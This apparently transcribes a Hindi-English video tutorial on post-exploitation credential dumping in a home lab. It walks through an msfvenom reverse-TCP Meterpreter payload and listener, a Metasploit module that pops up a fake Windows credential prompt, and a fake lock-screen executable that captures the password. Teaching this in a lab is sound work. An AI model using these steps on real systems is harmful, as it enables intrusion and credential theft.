एथिकल हैकिंग करने के दौरान कैसे एथिकल हैकर्स या पेनिट्रेशन टेस्टर टारगेट सिस्टम को एक्सेस करने के बाद कैसे उस सिस्टम के यूजर नेम एंड पासवर्ड की इंफॉर्मेशन गैदर कर सकते हैं जिसको हम क्रेडेंशियल डंपिंग बोलते हैं। आज के इस वीडियो में हम समझने वाले हैं क्रेडेंशियल डंपिंग क्या होती है और किस तरीके से आप टारगेट यानी कि जो आपकी विक्टिम मशीन है वहां पे हम यूजर नेम एंड पासवर्ड कैप्चर कर सकते हैं। जो भी उसके यूजर नेम पासवर्ड होंगे कैसे हम गैदर कर सकते हैं मल्टीपल टेक्निक्स के थ्रू आज हम इसके बारे में बात करने वाले हैं और समझने वाले हैं कैसे ये परफॉर्म करा जाता है इन सिक्योरिटी टेस्टिंग। सो मेरा नाम है राहुल कुमार और आप देख रहे हैं साइबर सिक्योरिटी। इस वीडियो को स्टार्ट करते हैं बिना किसी देरी के। तो हमारे पास यहाँ पे टर्मिनल है काले लिनक्स का एंड वी हैव अवर सेकंड मशीन विंडोज ऑपरेटिंग सिस्टम विच विल बी अवर विक्टिम मशीन जिस पे हम अटैक करने वाले हैं। अभी इन द मेन टाइम हम यहाँ पे मैं आपको बताने वाला हूँ किस तरीके से एथिकल हैकर्स मेनली पेलोड को जनरेट करते हैं एंड कैसे क्रेडेंशियल डंपिंग परफॉर्म करते हैं। पेलोड जनरेशन के ऊपर डिटेल वीडियो तो मैं ऑलरेडी अपलोड कर चुका हूँ, तो इस वीडियो में हम मेनली फोकस पेलोड जनरेशन पे नहीं, हम यहाँ पे बात करने वाले हैं क्रेडेंशियल डंपिंग के ऊपर। जिन लोगों ने मेरा मेटास्प्लॉइट फ्रेमवर्क का वीडियो नहीं देखा, आई बटन पर लिंक है, आप चेकआउट कर सकते हैं उस वीडियो को डिटेल में समझने के लिए। इन द मीन टाइम मैं आपको बता देता हूँ किस तरीके से पेलोड को जनरेट करा जाता है विद द हेल्प ऑफ एमएसएफ मैनम। अगर आप प्रोग्रामिंग में अच्छे हैं तो आप अपने खुद के पेलोड्स प्रोग्रामिंग के थ्रू लिख सकते हैं, लेकिन अगर आपके प्रोग्रामिंग इतना अच्छा नहीं है देन यू कैन यूज मेटास्प्लॉइट फ्रेमवर्क टू जनरेट योर पेलोड एक्सप्लॉइट्स एंड अदर थिंग्स। पेलोड बनाने के लिए बहुत सिंपल कमांड है, यहाँ पे आपको लिखना है sudo परमिशन के लिए msf venom, जिसका हम इस्तेमाल करने वाले हैं पेलोड रेडी करने के लिए। MSNF हाइफन पी यहाँ पे देंगे यानी कि पेलोड को आप डिफाइन करेंगे हाइफन पी। देन आप यहाँ पे देंगे विंडोज, जिस भी प्लेटफॉर्म का आप पेलोड बना रहे होंगे वहां पे लिखो विंडोज स्लैश मीटर प्रीटर स्लैश रिवर्स टीसीपी। ये बेसिकली आपने दे दिया। देन यहाँ पे आप दोगे अपना एल होस्ट का आईपी यानी कि लोकल होस्ट जो होगा उसका आप आईपी एड्रेस यहाँ पे देंगे। तो लोकल होस्ट का आईपी एड्रेस चेक करने के लिए हम यहाँ पे कमांड रन करेंगे IPA, and we have our IP address which is 192.168.132.129. Simply copy this IP address here. Then we have to put the L port, which means we have to specify the L port local port number. So here I'm using 5555, 4 times 5 port number for this. Then we have to specify the format of this payload, which is EXE, because we are going to use this payload on our Windows operating system. Then we have to use hyphen O, means the output file name. Payload name is basically a payload.exe. Let's put this name .exe. Let's check if everything is okay. So msfn hyphen p windows meterpreter reverse tcp l host l port hyphen fnx hyphen o payload.exe, enter press, enter the password, press enter, and within a few minutes या within a minute यहाँ पे आपको जो पेलोड होगा वो रेडी होके मिल जाएगा। As you can see here, our final size of exe file is 73802 byte. Just press ls, and here we have the payload.exe. So mainly मैं यहाँ पे क्या करता हूँ, इसको cp sudo कमांड चलाऊंगा, sudo cp payload.exe को हम कॉपी करेंगे स्लैश यूएस स्लैश var www.html के यहाँ पे अंदर मैं यहाँ पे इसको शेयर कर दूंगा। एंटर प्रेस करते हैं एंड अगर आपको चेक करना हो तो आप यहाँ पे इस डायरेक्टरी में जाके चेक कर सकते हैं। www.html प्रेस एंटर ls, और here you can see हमारे पास जो payload.exe है वो यहाँ पे आ चुका है। नाउ वी हैव टू सेट अप द लिसनर ऑफ दिस पेलोड। सो इसके लिए मैं सिंपल यहाँ पे स्क्रीन को क्लियर करता हूँ और इस वाली टर्मिनल को हम कर देते हैं कोलैप्स। क्लियर एक्ट कोलैप्स टर्मिनल एंड मैं इसको हमको बड़ा कर लेता हूँ। देन मैं यहाँ पे लिखना sudo msf console। तो बेसिकली यहाँ पे हम क्या कर रहे हैं, हमने जो पेलोड रेडी करा है उसका लिस्टनर हम यहाँ पे एक्टिव करेंगे, यानी कि जैसे ही हमारा विक्टिम इस पेलोड को डाउनलोड करेगा उसी टाइम पे यहाँ पे हम उसको कनेक्शन, उसका रिवर्स कनेक्शन हमको यहाँ पे देखने के लिए मिल जाएगा। क्योंकि हमारा मेटास्प्लॉइट फ्रेमवर्क आ चुका है तो यहाँ पे हमको यूज करना है एक्सप्लॉइट स्लैश मल्टी हैंडलर
सो हमारा मल्टी हैंडलर जो एक्सप्लॉइट वो आ चुका है। अब हमको यहाँ पे पेलोड डिफाइन करना है, जो पेलोड को हमने डिफाइन करा था अपने पेलोड को जनरेट करते वक्त, यानी कि विंडोज मीटरप्रेटर वाला पेलोड। तो यहाँ पे हम सेम पेलोड यहाँ पे दे देंगे, विंडोज स्लैश मीटरप्रेटर स्लैश रिवर्स टीसीपी। I hope the spelling is correct. Set Windows Meter Operator Reverse TCP Enter press। अब चाहें तो आप यहाँ पे ऑप्शंस चेक कर सकते हैं। जो हमारा एल होस्ट है वो हमारा आईपी हो जाएगा, वो होगा 192.168 एंड ओ सॉरी आई फॉरगॉट द आईपी। हम वापस से एक बार आईपी चेक कर लेते हैं क्या है। हमारा आईपी एड्रेस है 132.139 सॉरी। सो हम यहाँ पे देख लेते हैं हमारा आईपी एड्रेस 132.129 एंटर। एंड हम यहाँ पे अब सेट करेंगे एल पोर्ट, जिस पोर्ट पे हमारा पेलोड लिसन कर रहा होगा। एंटर हम प्रेस करेंगे। अब यहाँ पे हमें प्रेस करना है रन। सो बेसिकली हमने यहाँ पे अपना लिसनर एक्टिव कर दिया एंड वो लिसनिंग मोड पे आ चुका है। जैसे ही विक्टिम इस पेलोड को डाउनलोड करेगा जो हमने यहाँ पे स्टोर कर रखा है, वैसे ही हमको यहाँ पे उसका कनेक्शन मिल जाएगा। अब हमारा यहाँ का काम होता है कंप्लीट। अब हमें जाना है अपने विंडोज ऑपरेटिंग सिस्टम पे और हम ब्राउजर ओपन करते हैं। और ब्राउजर ओपन करने के बाद हमें क्या करना है, जो हमारे पास विक्टिम होगा यानी कि जो हमारा क्लाइंट मशीन होगी, जिसमें हम टेस्टिंग कर रहे हैं, उस पे आपको ये पेलोड रन करना है। पेलोड रन करने के बाद आपको सिंपल यहाँ पे देना है इस आईपी। आईपी में यहाँ पे प्रेस करते हैं और एंटर प्रेस करता हूँ। सो आई थिंक इस पोर्ट पे रन नहीं कर रहा है, ये पोर्ट पे रन कर रहा है 800 पोर्ट पे। आई थिंक यहाँ पे पोर्ट का इशू नहीं है। आई थिंक मुझे यहाँ पे ऑन करना पड़ेगा अपना अपाचे सर्वर, जो अभी फिलहाल ऑन नहीं है। सो हम चेक कर लेते हैं sudo service apache 2 status। सो एज यू कैन सी हियर हमारा अपाचे 2 सर्वर अभी डिसेबल है। नो वरीज, हम इसको ऑन कर देते हैं स्टार्ट। लेट्स सी नाउ हमारा अपाचे सर्वर अब रनिंग कंडीशन में है। लेट्स गो बैक एंड हम यहाँ पे चेक कर सकते हैं हमारा। एंड इसके अलावा जो पोर्ट नंबर जिस पे अपाचे रन कर रहा है वो भी हम यहाँ पे सही डाल देते हैं, जो है 8। एज यू कैन सी हियर हमारा जो 888 पोर्ट नंबर पे हमारा अपाचे सर्वर रन कर रहा है। इसके साथ साथ हमें यहाँ पे डाउनलोड करना है जो पेलोड हमने डाउन अभी बनाया था, जो था पेलोड डॉट ई एक्स सी। अब सिंपल मैं इसको एंटर प्रेस करता हूँ और यहाँ पे आप देख सकते हो पेलोड डॉट ई एक्स सी डाउनलोड हो चुका है, जो मैंने वहां पे स्टोर करा था। अगर आपको इसका मैकेनिज्म समझ में नहीं आ रहा, ये पूरी चीज़ें समझ में नहीं आ रही कि कैसे मैंने पेलोड यहाँ पे डाउनलोड करा, कैसे बनाया, इन डिटेल अगर आपको समझना है तो ये मैंने इन डिटेल बताया अपने मेटास्प्लॉइट फ्रेमवर्क के कंप्लीट ट्यूटोरियल वीडियो में, जिसका लिंक नीचे डिस्क्रिप्शन पे और प्लेलिस्ट का लिंक भी डिस्क्रिप्शन पे आपको मिल जाएगा और आई बटन पे देखने के लिए मिल जाएगा। उसको जाके आप चेकआउट करके इसके जो बैकएंड में जो प्रोसेस चल रहा है वो भी आप क्लियरली समझ पाएंगे। सो फिलहाल मैं इस पेलोड को यहाँ से जैसे ही मैं क्लिक करता हूँ ओपन के लिए, इट्स लाइक नॉर्मल आप जब कोई भी एप्लीकेशन आप डाउनलोड करते हो तो वहाँ पे कुछ इस तरीके का इंटरफेस आता है और ऐसे आप उसको डाउनलोड करते हो। लेकिन अगर मैं आप उसको रन एनीवे करता हूँ तो यहाँ पे तो आपको कुछ नजर नहीं आएगा रन एनीवे करने पे। लेकिन अगर मैं आपको अपने जो अटैकर मशीन था यहाँ पे दिखाऊंगा तो यहाँ पे आप देख सकते हो जो मेरा मीटर पे सेशन था वो यहाँ पे मुझे मिल चुका है। अब अगर मैं आपको सिस इन्फो करके दिखाता हूँ, एंटर में प्रेस करूंगा तो यहाँ पे आप देखोगे मेरे पास विंडोज 10 का कंप्लीट एक्सेस मिल चुका है। सो ये बहुत ही बेसिक सी चीज़ है और बहुत बेसिक सा मैंने पेलोड बनाया है। और मैंने यहाँ पे ब्राउज़र की सिक्योरिटी भी यहाँ पे मैंने लो कर दी थी। जस्ट फॉर दिस एजुकेशनल पर्पस वीडियो मैं आपको समझाना चाह रहा हूँ कि किस तरीके से हैकिंग करी जाती है और पेन टेस्टिंग करी जाती है। अब यहाँ पे तो हमने बात कर ली, हमें सिस्टम का एक्सेस मिल गया है रिमोटली। अब हम समझते हैं कि क्रेडेंशियल डंपिंग कैसे करा जाए। अभी तो हमने टारगेट सिस्टम पे हमने जो हमने पेलोड बनाया था वो हमने डाउनलोड करवा दिया, लेकिन स्टिल वी डोंट हैव द यूजर नेम एंड पासवर्ड ऑफ दैट टारगेट सिस्टम। अब अगर मुझे उसका यूजर नेम पासवर्ड चाहिए, वैसे उसके कई तरीके हैं, आप हैशडम के थ्रू भी ले सकते हैं। लेकिन अगर आपको फिशिंग के थ्रू एक लिंक भेज के एक फाइल अपलोड करके किस कौन कौन से तरीके हैं जिसके थ्रू आप यूजर नेम पासवर्ड निकाल सकते हो, क्रेडेंशियल डंप कर सकते हो, हम वो देखने वाले हैं। बाय डिफॉल्ट यहाँ पे मेटास्प्लॉइट फ्रेमवर्क में आपको विंडोज के फिश का बेसिकली पेलोड एक्सप्लॉइट्स देखने के लिए मिल जाते हैं। तो कैसे आपको सर्च करना है, सर्च करने के लिए सबसे पहले इस सेशन को हम बैकग्राउंड में डाल देते हैं। एंटर में प्रेस करते हैं। अब मुझे यहाँ पे सर्च करना है, सर्च बेसिकली पोस्ट एक्सप्लॉइट है। सर्च फिश में यहाँ पे सर्च करता हूँ एंड फिश सर्च करने के बाद यहाँ पे आपको दिखता होगा गैदर फिश विंडोज क्रेडेंशियल। अब यू जस्ट नीड टू डू कॉपी दिस सिलेक्शन
एंड अब हमको यहाँ पे यूज की कमांड चलानी, यूज पोस्ट एंटर हम प्रेस करेंगे, देन हम यहाँ पे करते हैं ऑप्शंस का यूज। अब यहाँ पे हमको अपना सेशन स्पेसिफाई करना है जो भी हमने बैकग्राउंड में डाला है। अगर आपको चेक करना हो कि आपका कौन सा सेशन है बैकग्राउंड में, आप सिंपल सेशन हाइफन आई या फिर आप नॉर्मल सेशन पे भी आप क्लिक कर सकते हो। तो यहाँ पे आप देख सकते हो सेशन की आईडी यहाँ पे आपको नजर आ रही है। तो हमको यहाँ पे सेशन स्पेसिफाई करना है, तो हम यहाँ पे लिखेंगे सेट सेशन, और सेशन की जो आईडी है वो हम यहाँ पे देंगे सेशन आईडी 1, एंटर हम प्रेस करते हैं। अब यहाँ पे हमारे पास अगर आप चेक करोगे तो सेशन आईडी हमारे पास 1 सेलेक्ट हो चुकी है। इस वाले टर्मिनल को मैं करता हूँ कोलैप्स, एंड यहाँ पे मैं करता हूँ उसको एक्सपैंड। अब सिंपल आपको यहाँ पे रन कमांड का इस्तेमाल करना है, लेकिन रन कमांड को इस्तेमाल करने से पहले मैं आपको यहाँ पे दिखा देता हूँ इस टर्मिनल पे फिलहाल कुछ नजर नहीं आ रहा है। लेकिन अगर मैं यहाँ से रन कमांड को प्रेस करता हूँ, बेसिकली रन कमांड को यहाँ पे मैं एंटर प्रेस करता हूँ लिखने के बाद, तो यहाँ पे आप देखोगे विंडोज मशीन पे, तो यहाँ पे बेसिकली आप यहाँ पहले देख लीजिए पावर शेल जो है इंस्टॉल हो चुका है, स्टार्टिंग द पॉपअप स्क्रिप्ट। अब यहाँ पे बता रहा है वेटिंग ऑन द यूजर टू फिल इन हिज क्रेडेंशियल, इट मींस समथिंग हैपेंड ऑन अवर टारगेट मशीन। अगर मैं विंडोज पे जाता हूँ तो यहाँ पे आप देखोगे मेरे पास एक पॉपअप आ जाता है विंडोज सिक्योरिटी का, यूजर नेम एंड पासवर्ड। तो बेसिकली ये एक तरीके होते हैं कि आप टारगेट यूजर को इंसिस्ट कर रहे हो उसका पासवर्ड डालने के लिए। अगर नॉर्मल आप भी कोई सिस्टम पे एप्लीकेशन रन कर रहे हो, सडनली यू गॉट द पॉपअप, तो ऑफ कोर्स देयर आर चांसेस यू फिल आउट योर पासवर्ड एंड यूजर नेम डिटेल्स। तो यहाँ पे हम पासवर्ड लेट्स से मैं दे देता हूँ 123456, एंड मैं यहाँ पे एंटर प्रेस करता हूँ। अब मैं अगर बैक मशीन पे जाता हूँ अपने काली मशीन पे, तो बेसिकली यहाँ पे हमको अभी दिखा रहा है पोस्ट इंटरप्टेड बाय कंट्रोल यूजर। नो प्रॉब्लम, हम वापस से स्क्रिप्ट को रन करेंगे। हम वापस से रन कमांड का इस्तेमाल करते हैं और इसको हम रन करते हैं। तो वापस से हमारा पावर शेल इंस्टॉल्ड हो चुका है यहाँ पे, और यहाँ पे आप देखोगे हमारे पास जो पासवर्ड है वो आ चुका है। अब मैं वापस से 123567 डाल देता हूँ और एंटर मैं यहाँ पे प्रेस करता हूँ। तो वापस हमारे पास प्रॉम्प्ट आ रहा है, मैं वापस से पासवर्ड देता हूँ, फिर मैं एंटर प्रेस करता हूँ। तो यहाँ पे मैं पासवर्ड देता हूँ 12345, प्रेस एंटर एंड प्रेस करता हूँ अगेन सेइंग इनवैलिड क्रेडेंशियल्स। बट अगर आप यहाँ पे देखोगे जो भी मैं वहाँ पे पासवर्ड डाल रहा हूँ वो यहाँ पे मुझे नजर आ रहा है 12345, जो भी मैंने पासवर्ड वहाँ पे डाला है। तो ये तो है पहला तरीका जो कि आपको मेटास्प्लॉइट फ्रेमवर्क के अंदर इनबिल्ट उनका जो पोस्ट बेसिकली एक मेथड होता है, जब आपने एक्सप्लॉइट कर दिया उसके बाद फर्दर चीजें करते हो उसमें पोस्ट बेसिकली उसमें ये चीज आपको देखने के लिए मिल जाती है। बट वी हैव अदर ऑप्शंस, अदर पेलोड्स एज वेल विच यू कैन अपलोड ऑन योर टारगेट मशीन। अब वो कौन कौन से ऑप्शन ऑप्शन से मैं आपको बताता हूँ। तो हमारे पास एक बेसिकली क्या है, फेक लॉक स्क्रीन डॉट ई एक्स करके फाइल है जो कि आप गिटहब से डाउनलोड कर सकते हो, इसका लिंक नीचे डिस्क्रिप्शन पे है। अब मुझे करना यह है, मुझे सिंपली वो वाली फाइल को मुझे अपलोड करना है अपने टारगेट मशीन पे। तो मैं यहाँ पे एक और टर्मिनल ओपन कर लेता हूँ आपके सामने, और पहले मैं आपको शो भी कर देता हूँ वो एग्जैक्टली फाइल है कहाँ पे। तो मैं यहाँ पे आता हूँ स्लैश होम राहुल, एंड वो फाइल मैंने यहाँ पे डाउनलोड में रखी हुई है। एलएस में कर देता हूँ, तो यहाँ पे आप देख सकते हो फेक लॉगिन स्क्रीन एंड फेक लॉगिन स्क्रीन टू फाइल डॉट एक्सी, मैंने ये फाइल यहाँ पे रखी हुई है। सिंपली मैं आपका आपका प्रेजेंट वर्किंग डायरेक्टरी मेरी है वो है होम राहुल डाउनलोड्स में। अभी मुझे क्या करना है, मुझे यहाँ पे बैक टू द सेशन, मुझे यहाँ पे जाना है सेशन। मैं यहाँ पे बैक चले जाता हूँ यहाँ से। तो यहाँ पे मेरा सेशन यहाँ पे चल रहा है, तो सिंपली मैं यहाँ पे सेशन में जाता हूँ, सेशन हाइफन आई 1, एंड वी हैव आवर मीटर पीटर अगेन। सो नाउ अब मुझे यहाँ पे क्या करना है, मुझे एक फाइल यहाँ से अपलोड करनी है अपने मशीन से टारगेट मशीन पे। तो ये फाइल एग्जैक्टली हैगा होम राहुल के अंदर डाउनलोड्स में ये फाइल है, और जिसका नाम है फेक लॉगऑन स्क्रीन डॉट ई एक्स सी। ये फाइल है, और ये मुझे टारगेट यानी जो मेरा टारगेट सिस्टम है विंडोज, मुझे वहां पे अपलोड करनी है। तो मैं एंटर प्रेस करता हूँ। तो आप यहाँ पे देख सकते हो फेक लॉगिन स्क्रीन थी, फाइल थी, वो यहाँ पे डाउनलोड हो चुकी है। मैं यहाँ पे एलएस करता हूँ। एलएस करने के बाद आप अगर यहाँ पे आप देखोगे सारी डायरेक्टरीज में वो फाइल है जो मेरी विंडोज मशीन पे दिख रही है आपको। तो यहाँ पे देख सकते हो फेक लॉगिन स्क्रीन डॉट ई फाइल आ चुकी है। तो मुझे सिंपली क्या करना है, मुझे इस फाइल को रन करना है, लेकिन मैं यहाँ पे इस फाइल को रन नहीं कर सकता हूँ क्योंकि मैं मीटर पीटर सेल में हूँ, तो यहाँ पे कंप्लीटली और वो इफेक्टिवली यहाँ पे रन नहीं होगी। तो मैं यहाँ पे क्या करता हूँ, मैं शेल यहाँ पे एक्सेस लेता हूँ। शेल मैंने यहाँ पे दिया, dir करता हूँ, एंड dir करने के बाद यहाँ पे फेक लॉग ऑन स्क्रीन डॉट एक्सी फाइल यहाँ पे नजर आ रही है। तो सिंपली मैं क्या करता हूँ, इस फाइल को मुझे यहाँ पे क्या करना है, कॉपी पेस्ट कर लेना है नाम इसका। तो मैं यहाँ पे करता हूँ इसका नाम कॉपी, पेस्ट इट हियर। तो यहाँ पे फेक लॉग ऑन स्क्रीन जो मैंने यहाँ पे कॉपी पेस्ट करा था, अगर मैं विंडोज मशीन पे जाता हूँ तो यहाँ पे आप देखोगे अभी फिलहाल आपके सामने नजर कुछ नहीं आ रहा है, लेकिन सडनली मेरे पास मेरी स्क्रीन जो है वो लॉक हो चुकी है।
स्क्रीन लॉक होने के बाद नाउ अब हम चाहते हैं हमारा जो विक्टिम है, जो हमारा क्लाइंट है, वो यहाँ पे पासवर्ड डाले। अब जैसे ही वो यहाँ पे पासवर्ड डालता है 1 2 3 4 5 7 8 तक मैं पासवर्ड डालता हूँ और एंटर प्रेस करता हूँ, तो दिखा रहे हैं पासवर्ड इज़ इनकरेक्ट। अगर मैं यहाँ पे जाता हूँ खाली पे, तो यहाँ पे भी बेसिकली यहाँ पे अगर आप देखोगे तो यहाँ पे दिखा रहा है जो पासवर्ड है वो मैंने गलत पासवर्ड डाला है 1 2 3 4 5 6 7 8। लेकिन अभी जब तक ओपन नहीं करने देगा जब तक आप सही पासवर्ड ना डालो। तो मेरे सिस्टम का पासवर्ड है 1 2 3 4 5 और एंटर में प्रेस करता हूँ। आप देख सकते हो मेरा जो सिस्टम है वो अनलॉक हो चुका है। अब अगर यहाँ पे आप देखोगे तो मेरा करेक्ट पासवर्ड मुझे यहाँ पे शो कर रहा है। मैं इसको यहाँ पे कोलैप्स कर लेता हूँ। सो एज़ यू कैन सी हियर यहाँ पे मेरा पासवर्ड जो है करेक्ट पासवर्ड यहाँ पे शो कर रहा है। तो ये सेकंड तरीका है किस तरीके से आप यहाँ पे जो हमारे पास पासवर्ड्स हैं, जो क्रेडेंशियल्स हैं वो डंप कर सकते हैं। अगेन वी हैव आवर मीटर शेल। नाउ वी हैव अनदर पेलोड इन अवर डाउनलोड्स डायरेक्टरी। मैं आपको यहाँ पे दिखा देता हूँ जिसका नाम है sharplocker.exe। इस भी फाइल को आप गिटहब से डाउनलोड कर सकते हो। इसकी रेपो आपको वहाँ मिल जाएगी या फिर आप sharp.exe को आप डाउनलोड कर सकते हो ज़िप के फॉर्मेट में भी और सेम तरीके से आप इसको अपलोड कर सकते हो। तो ये कुछ तरीके हैं जिसकी मदद से आप टारगेट सिस्टम पे क्रेडेंशियल डंपिंग कर सकते हो। इसके अलावा पावरशेल एम्पायर का हम इस्तेमाल करते हैं क्रेडेंशियल डंपिंग के लिए। तो अगर वो वाली वीडियो आपकी देखनी है तो कमेंट डाउन बिलो। अगर इसी तरीके से और एडवांस वीडियोस अगर आप चाहते हो ऑन रेड टीमिंग, ब्लू टीमिंग, पर्पल टीमिंग, देन कमेंट डाउन बिलो। अगर आपका सपोर्ट मिलता रहेगा मैं डेफिनिटली आपको फोरेंसिक्स के ऊपर, इंसिडेंट रिस्पांस के ऊपर, रेड टीमिंग, ब्लू टीमिंग के ऊपर वीडियोस लाता रहूंगा। सो आई होप आपको वीडियो पसंद आई होगी। वीडियो को पसंद आई तो प्लीज लाइक शेयर सब्सक्राइब जरूर करके जाएं। एंड इसी तरह से मिलते हैं नेक्स्ट वीडियो में। टिल देन गुड बाय।